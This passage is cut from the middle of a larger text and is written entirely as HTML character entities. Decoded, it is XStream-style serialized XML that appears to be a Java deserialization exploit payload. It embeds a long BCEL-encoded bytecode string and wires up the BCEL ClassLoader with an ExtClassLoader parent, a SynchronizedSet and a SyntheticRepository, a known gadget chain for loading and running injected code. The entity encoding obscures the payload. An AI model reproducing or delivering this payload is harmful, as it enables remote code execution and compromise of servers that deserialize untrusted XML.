62;&#x31;&#x6a;&#x24;&#x6e;&#x24;&#x37;&#x65;&#x24;&#x38;&#x32;&#x24;&#x54;&#x24;&#x65;&#x33;&#x24;&#x66;&#x30;&#x24;&#x37;&#x63;&#x24;&#x62;&#x35;&#x24;&#x70;&#x24;&#x62;&#x64;&#x24;&#x38;&#x66;&#x24;&#x63;&#x39;&#x24;&#x62;&#x66;&#x24;&#x61;&#x36;&#x24;&#x38;&#x31;&#x24;&#x43;&#x24;&#x64;&#x32;&#x24;&#x65;&#x35;&#x24;&#x35;&#x65;&#x24;&#x64;&#x61;&#x30;&#x24;&#x62;&#x38;&#x24;&#x65;&#x62;&#x24;&#x39;&#x61;&#x24;&#x63;&#x31;&#x24;&#x51;&#x24;&#x49;&#x24;&#x63;&#x35;&#x24;&#x24;&#x24;&#x38;&#x62;&#x24;&#x6e;&#x51;&#x4f;&#x24;&#x63;&#x38;&#x24;&#x53;&#x24;&#x38;&#x65;&#x24;&#x65;&#x63;&#x24;&#x39;&#x30;&#x24;&#x63;&#x63;&#x24;&#x38;&#x65;&#x24;&#x39;&#x31;&#x24;&#x38;&#x37;&#x24;&#x64;&#x37;&#x24;&#x63;&#x35;&#x55;&#x24;&#x61;&#x31;&#x24;&#x4f;&#x24;&#x65;&#x64;&#x24;&#x62;&#x34;&#x24;&#x33;&#x62;&#x24;&#x63;&#x31;&#x24;&#x76;&#x24;&#x61;&#x65;&#x24;&#x61;&#x37;&#x24;&#x33;&#x62;&#x24;&#x39;&#x65;&#x24;&#x37;&#x62;&#x24;&#x63;&#x39;&#x24;&#x66;&#x34;&#x24;&#x4b;&#x24;&#x66;&#x66;&#x62;&#x74;&#x79;&#x24;&#x66;&#x33;&#x24;&#x62;&#x34;&#x24;&#x48;&#x24;&#x64;&#x32;&#x24;&#x64;&#x39;&#x24;&#x62;&#x32;&#x24;&#x65;&#x35;&#x24;&#x39;&#x39;&#x24;&#x61;&#x62;&#x24;&#x45;&#x24;&#x61;&#x38;&#x50;&#x24;&#x69;&#x24;&#x50;&#x24;&#x39;&#x38;&#x24;&#x62;&#x36;&#x24;&#x39;&#x61;&#x24;&#x61;&#x32;&#x54;&#x24;&#x63;&#x35;&#x24;&#x61;&#x32;&#x24;&#x39;&#x37;&#x6e;&#x79;&#x24;&#x63;&#x31;&#x24;&#x61;&#x64;&#x24;&#x35;&#x65;&#x24;&#x62;&#x32;&#x24;&#x62;&#x36;&#x24;&#x64;&#x38;&#x54;&#x24;&#x63;&#x66;&#x76;&#x78;&#x24;&#x63;&#x61;&#x24;&#x38;&#x62;&#x6f;&#x70;&#x24;&#x38;&#x33;&#x24;&#x61;&#x36;&#x24;&#x64;&#x31;&#x63;&#x24;&#x63;&#x61;&#x73;&#x24;&#x64;&#x65;&#x24;&#x62;&#x31;&#x45;&#x24;&#x7a;&#x24;&#x63;&#x36;&#x6a;&#x24;&#x61;&#x32;&#x24;&#x61;&#x39;&#x24;&#x4b;&#x69;&#x32;&#x50;&#x34;&#x53;&#x56;&#x24;&#x61;&#x39;&#x24;&#x65;&#x63;&#x24;&#x39;&#x31;&#x24;&#x74;&#x24;&#x64;&#x37;&#x57;&#x24;&#x65;&#x39;&#x66;&#x6c;&#x46;&#x44;&#x24;&#x64;&#x33;&#x62;&#x24;&#x38;&#x62;&#x24;&#x38;&#x32;&#x24;&#x64;&#x63;&#x24;&#x33;&#x62;&#x63;&#x24;&#x33;&#x62;&#x24;&#x77;&#x44;&#x31;&#x24;&#x64;&#x34;&#x24;&#x62;&#x32;&#x24;&#x63;&#x62;&#x24;&#x74;&#x78;&#x24;&#x64;&#x31;&#x24;&#x35;&#x63;&#x24;&#x61;&#x64;&#x4c;&#x24;&#x39;&#x37;&#x24;&#x66;&#x66;&#x24;&#x49;&#x69;&#x24;&#x65;&#x62;&#x24;&#x63;&#x64;&#x24;&#x74;&#x4c;&#x56;&#x24;&#x64;&#x30;&#x24;&#x64;&#x64;&#x24;&#x5a;&#x24;&#x62;&#x61;&#x30;&#x24;&#x63;&#x31;&#x24;&#x71;&#x24;&#x61;&#x37;&#x24;&#x38;&#x32;&#x24;&#x38;&#x35;&#x24;&#x61;&#x63;&#x24;&#x38;&#x30;&#x24;&#x61;&#x39;&#x24;&#x62;&#x64;&#x61;&#x24;&#x50;&#x32;&#x6e;&#x24;&#x24;&#x24;&#x64;&#x31;&#x24;&#x63;&#x32;&#x24;&#x4c;&#x66;&#x24;&#x66;&#x61;&#x24;&#x39;&#x63;&#x24;&#x61;&#x33;&#x24;&#x68;&#x24;&#x69;&#x24;&#x38;&#x37;&#x70;&#x24;&#x39;&#x34;&#x24;&#x39;&#x65;&#x24;&#x6d;&#x24;&#x66;&#x31;&#x24;&#x74;&#x24;&#x64;&#x31;&#x24;&#x33;&#x66;&#x4d;&#x6a;&#x24;&#x61;&#x32;&#x24;&#x63;&#x37;&#x24;&#x38;&#x38;&#x24;&#x66;&#x39;&#x24;&#x6b;&#x24;&#x4e;&#x68;&#x24;&#x71;&#x24;&#x65;&#x39;&#x5f;&#x24;&#x63;&#x37;&#x24;&#x65;&#x65;&#x24;&#x34;&#x30;&#x24;&#x62;&#x61;&#x24;&#x38;&#x62;&#x24;&#x33;&#x61;&#x24;&#x6c;&#x24;&#x66;&#x35;&#x24;&#x64;&#x31;&#x24;&#x39;&#x30;&#x24;&#x38;&#x66;&#x70;&#x24;&#x66;&#x36;&#x78;&#x24;&#x62;&#x34;&#x24;&#x61;&#x31;&#x24;&#x66;&#x65;&#x67;&#x30;&#x24;&#x6c;&#x24;&#x66;&#x32;&#x24;&#x66;&#x34;&#x24;&#x4a;&#x24;&#x38;&#x39;&#x56;&#x24;&#x52;&#x24;&#x6c;&#x24;&#x63;&#x61;&#x4c;&#x24;&#x61;&#x66;&#x24;&#x38;&#x66;&#x46;&#x24;&#x6c;&#x6a;&#x24;&#x62;&#x34;&#x24;&#x63;&#x39;&#x24;&#x63;&#x37;&#x24;&#x61;&#x65;&#x54;&#x48;&#x24;&#x4c;&#x24;&#x39;&#x31;&#x65;&#x24;&#x62;&#x33;&#x24;&#x57;&#x24;&#x6f;&#x69;&#x4b;&#x24;&#x77;&#x24;&#x61;&#x63;&#x24;&#x38;&#x35;&#x49;&#x24;&#x5a;&#x24;&#x64;&#x64;&#x24;&#x35;&#x64;&#x75;&#x4a;&#x35;&#x68;&#x24;&#x4e;&#x5a;&#x24;&#x62;&#x38;&#x24;&#x65;&#x61;&#x24;&#x66;&#x37;&#x24;&#x78;&#x24;&#x61;&#x32;&#x24;&#x76;&#x24;&#x61;&#x36;&#x24;&#x62;&#x31;&#x68;&#x24;&#x61;&#x62;&#x24;&#x38;&#x66;&#x24;&#x33;&#x64;&#x24;&#x43;&#x24;&#x6f;&#x24;&#x64;&#x61;&#x24;&#x57;&#x24;&#x6f;&#x24;&#x61;&#x62;&#x24;&#x66;&#x39;&#x24;&#x66;&#x61;&#x68;&#x24;&#x37;&#x62;&#x4e;&#x24;&#x39;&#x38;&#x24;&#x63;&#x61;&#x24;&#x39;&#x61;&#x24;&#x64;&#x63;&#x4b;&#x24;&#x38;&#x32;&#x24;&#x49;&#x24;&#x4a;&#x24;&#x33;&#x61;&#x72;&#x24;&#x38;&#x31;&#x79;&#x24;&#x37;&#x62;&#x24;&#x77;&#x24;&#x61;&#x32;&#x45;&#x24;&#x61;&#x32;&#x24;&#x39;&#x64;&#x24;&#x33;&#x65;&#x24;&#x62;&#x34;&#x24;&#x35;&#x62;&#x24;&#x59;&#x24;&#x66;&#x39;&#x24;&#x4a;&#x24;&#x37;&#x62;&#x24;&#x65;&#x37;&#x24;&#x65;&#x66;&#x62;&#x24;&#x39;&#x66;&#x24;&#x57;&#x69;&#x24;&#x65;&#x39;&#x24;&#x66;&#x32;&#x24;&#x62;&#x31;&#x24;&#x64;&#x66;&#x24;&#x63;&#x37;&#x24;&#x54;&#x24;&#x33;&#x65;&#x24;&#x4f;&#x24;&#x64;&#x63;&#x24;&#x63;&#x31;&#x24;&#x63;&#x31;&#x24;&#x75;&#x71;&#x24;&#x38;&#x37;&#x52;&#x24;&#x38;&#x61;&#x24;&#x63;&#x36;&#x34;&#x24;&#x63;&#x35;&#x24;&#x63;&#x37;&#x24;&#x65;&#x31;&#x24;&#x35;&#x62;&#x68;&#x24;&#x55;&#x24;&#x64;&#x66;&#x24;&#x74;&#x6f;&#x24;&#x70;&#x24;&#x69;&#x24;&#x37;&#x64;&#x24;&#x38;&#x61;&#x24;&#x62;&#x36;&#x24;&#x62;&#x39;&#x24;&#x4e;&#x39;&#x24;&#x37;&#x62;&#x24;&#x64;&#x63;&#x24;&#x63;&#x37;&#x24;&#x39;&#x31;&#x24;&#x6c;&#x24;&#x75;&#x24;&#x63;&#x66;&#x24;&#x51;&#x24;&#x37;&#x65;&#x24;&#x63;&#x33;&#x24;&#x65;&#x66;&#x24;&#x66;&#x34;&#x24;&#x6f;&#x24;&#x64;&#x36;&#x24;&#x65;&#x31;&#x38;&#x65;&#x24;&#x33;&#x61;&#x24;&#x38;&#x33;&#x56;&#x24;&#x61;&#x32;&#x24;&#x77;&#x49;&#x77;&#x24;&#x61;&#x31;&#x24;&#x46;&#x24;&#x63;&#x64;&#x24;&#x64;&#x38;&#x47;&#x24;&#x62;&#x34;&#x24;&#x68;&#x24;&#x62;&#x62;&#x24;&#x52;&#x24;&#x61;&#x37;&#x24;&#x64;&#x37;&#x77;&#x24;&#x39;&#x34;&#x74;&#x69;&#x24;&#x65;&#x63;&#x24;&#x63;&#x31;&#x24;&#x46;&#x24;&#x62;&#x34;&#x41;&#x24;&#x61;&#x37;&#x24;&#x66;&#x37;&#x24;&#x62;&#x36;&#x24;&#x38;&#x30;&#x24;&#x4f;&#x24;&#x39;&#x61;&#x24;&#x65;&#x65;&#x24;&#x39;&#x64;&#x24;&#x62;&#x38;&#x24;&#x4a;&#x24;&#x4e;&#x24;&#x64;&#x66;&#x24;&#x39;&#x31;&#x24;&#x65;&#x35;&#x24;&#x35;&#x64;&#x24;&#x65;&#x63;&#x24;&#x74;&#x24;&#x61;&#x63;&#x24;&#x24;&#x42;&#x24;&#x33;&#x62;&#x24;&#x38;&#x30;&#x24;&#x33;&#x66;&#x70;&#x24;&#x51;&#x24;&#x37;&#x66;&#x24;&#x65;&#x32;&#x30;&#x4e;&#x24;&#x51;&#x24;&#x64;&#x61;&#x32;&#x24;&#x63;&#x32;&#x24;&#x66;&#x37;&#x71;&#x24;&#x50;&#x24;&#x38;&#x64;&#x24;&#x4d;&#x24;&#x62;&#x64;&#x24;&#x4d;&#x24;&#x37;&#x64;&#x24;&#x4d;&#x24;&#x66;&#x64;&#x24;&#x4d;&#x24;&#x44;&#x24;&#x4d;&#x24;&#x38;&#x33;&#x24;&#x42;&#x24;&#x61;&#x35;&#x24;&#x66;&#x35;&#x50;&#x24;&#x34;&#x30;&#x24;&#x65;&#x33;&#x24;&#x38;&#x63;&#x24;&#x37;&#x65;&#x33;&#x48;&#x24;&#x63;&#x34;&#x24;&#x64;&#x64;&#x24;&#x61;&#x37;&#x24;&#x39;&#x38;&#x24;&#x66;&#x65;&#x24;&#x38;&#x37;&#x69;&#x24;&#x35;&#x64;&#x24;&#x63;&#x30;&#x24;&#x63;&#x35;&#x24;&#x65;&#x66;&#x53;&#x24;&#x64;&#x63;&#x24;&#x65;&#x34;&#x24;&#x64;&#x35;&#x24;&#x4c;&#x24;&#x66;&#x31;&#x24;&#x55;&#x24;&#x74;&#x42;&#x24;&#x65;&#x34;&#x24;&#x39;&#x62;&#x24;&#x61;&#x34;&#x24;&#x6a;&#x24;&#x65;&#x62;&#x30;&#x24;&#x66;&#x63;&#x24;&#x50;&#x24;&#x79;&#x24;&#x6a;&#x24;&#x63;&#x38;&#x24;&#x64;&#x37;&#x24;&#x38;&#x38;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x0a;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x32;&#x63;&#x65;&#x72;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x68;&#x61;&#x73;&#x68;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x20;&#x64;&#x65;&#x66;&#x69;&#x6e;&#x65;&#x64;&#x2d;&#x69;&#x6e;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x6c;&#x61;&#x6e;&#x67;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x69;&#x6e;&#x63;&#x69;&#x70;&#x61;&#x6c;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x3c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x22;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x73;&#x65;&#x74;&#x22;&#x3e;&#x3c;&#x2f;&#x63;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x75;&#x74;&#x65;&#x78;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x22;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x22;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x3e;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x74;&#x69;&#x76;&#x65;&#x4c;&#x69;&#x62;&#x72;&#x61;&#x72;&#x69;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x4c;&#x6f;&#x63;&#x6b;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x73;&#x75;&#x6e;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x53;&#x79;&#x6e;&#x74;&#x68;&#x65;&#x74;&#x69;&#x63;&#